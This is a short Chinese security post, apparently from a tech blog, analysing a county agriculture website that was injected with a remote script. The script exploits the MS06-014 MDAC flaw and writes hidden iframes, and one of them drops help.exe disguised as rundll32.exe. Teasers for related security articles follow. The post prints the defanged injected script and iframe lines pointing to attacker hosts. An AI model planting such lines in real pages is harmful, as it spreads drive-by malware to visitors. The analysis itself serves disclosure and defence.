某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码

简介: 某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码

在 Maxthon 中打开该网站,Maxthon 会假死几分钟。检查网页源文件,发现尾部被加入代码:

/---
<script language=javascript src=hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js></script>
---/

hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js 功能是检测 cookies 变量 starballlll,如果不存在则 创建此变量,然后尝试利用 MS06-014: msadco.dll的漏洞

《Microsoft 安全公告 MS06-014

Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码 (911562)

 http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx

成功则输出代码:

/---
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/014.htm></iframe>
---/

不成功则输出代码:

/---
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm></iframe>
<iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/046.htm></iframe>
---/

hxxp://www.st*a**rba*ll.com.cn/wm/014.htm 下载 help.exe,保存为 c:/windows/rundll32.exe


相关文章
|
1月前
|
安全 测试技术 网络安全
缓冲区溢出攻击的防范措施有哪些?
【10月更文挑战第20天】缓冲区溢出攻击的防范需要从编程实践、系统配置、漏洞检测与防护以及安全意识教育等多个方面入手,采取综合的防范措施,才能有效地降低缓冲区溢出攻击的风险,保障计算机系统和网络的安全运行。
|
7月前
|
SQL 云安全 安全
常见的web漏洞,网站漏洞该怎么办
随着互联网的发展,网站安全成为企业和个人关注焦点,尤其网站漏洞可能导致数据泄露、系统崩溃等严重后果。本文介绍了四种常见网站漏洞:XSS、SQL注入、文件包含和CSRF,以及它们的危害。为解决这些问题,建议加强代码审查、输入验证、使用安全API和库、访问控制等措施。此外,德迅云安全的漏洞扫描VSS服务可在Web漏洞扫描、弱密码扫描和中间件扫描等场景中发挥作用,帮助企业及时发现并处理安全问题,保障网站安全。
|
3月前
|
安全 网络安全 网络架构
【恶意代码系列】三、恶意代码迹象
【恶意代码系列】三、恶意代码迹象
|
7月前
|
存储 安全 搜索推荐
什么是恶意代码?
什么是恶意代码?
241 1
什么是恶意代码?
|
云安全 安全 开发工具
一觉醒来,小R的服务器被暴力破解,被植入挖矿程序?
一觉醒来,小R的服务器被暴力破解,被植入挖矿程序?
160 0
|
分布式计算 安全 网络协议
Zerobot僵尸网络出现了新的漏洞利用和功能
Zerobot僵尸网络出现了新的漏洞利用和功能
|
安全 网络安全 PHP
文件包含漏洞渗透攻击_2 | 学习笔记
快速学习 文件包含漏洞渗透攻击_2
161 0
文件包含漏洞渗透攻击_2 | 学习笔记
|
SQL 安全 Shell
文件包含漏洞渗透攻击_3 | 学习笔记
快速学习 文件包含漏洞渗透攻击_3
184 0
文件包含漏洞渗透攻击_3 | 学习笔记
|
安全 PHP 数据安全/隐私保护
网站安全问题针对一句话木马函数的普析与防范
PHP网站安全防一句话木马入侵一、首先是菜刀一句话木马:     菜刀一句话木马的原理是调用了PHP的代码执行函数,比如以下1和2两个常见的一句话菜刀马,就是调用了eval函数、assert函数。1、eval()函数  #传入的参数必须为PHP代码,既需要以分号结尾。
1552 0
|
安全 数据库 数据安全/隐私保护
网站被黑客挂马劫持有那些防范措施可以避免
做好网站建设维护绝对不是一件一帆风顺的事,都需要专业人员定期对网站进行安全做检查,尤其是对于人们口中所说的挂马、病毒、快照劫持、网站被黑等现象。为了防止出现这类危害,一定要做好预防,预防措施如何做?这也是今天泽民给大家分享的知识点,如果不处理当网站出现问题了对于维护也是十分困难的,下面这些网站被黑客挂马劫持预防小技巧你一定要知晓。
1147 0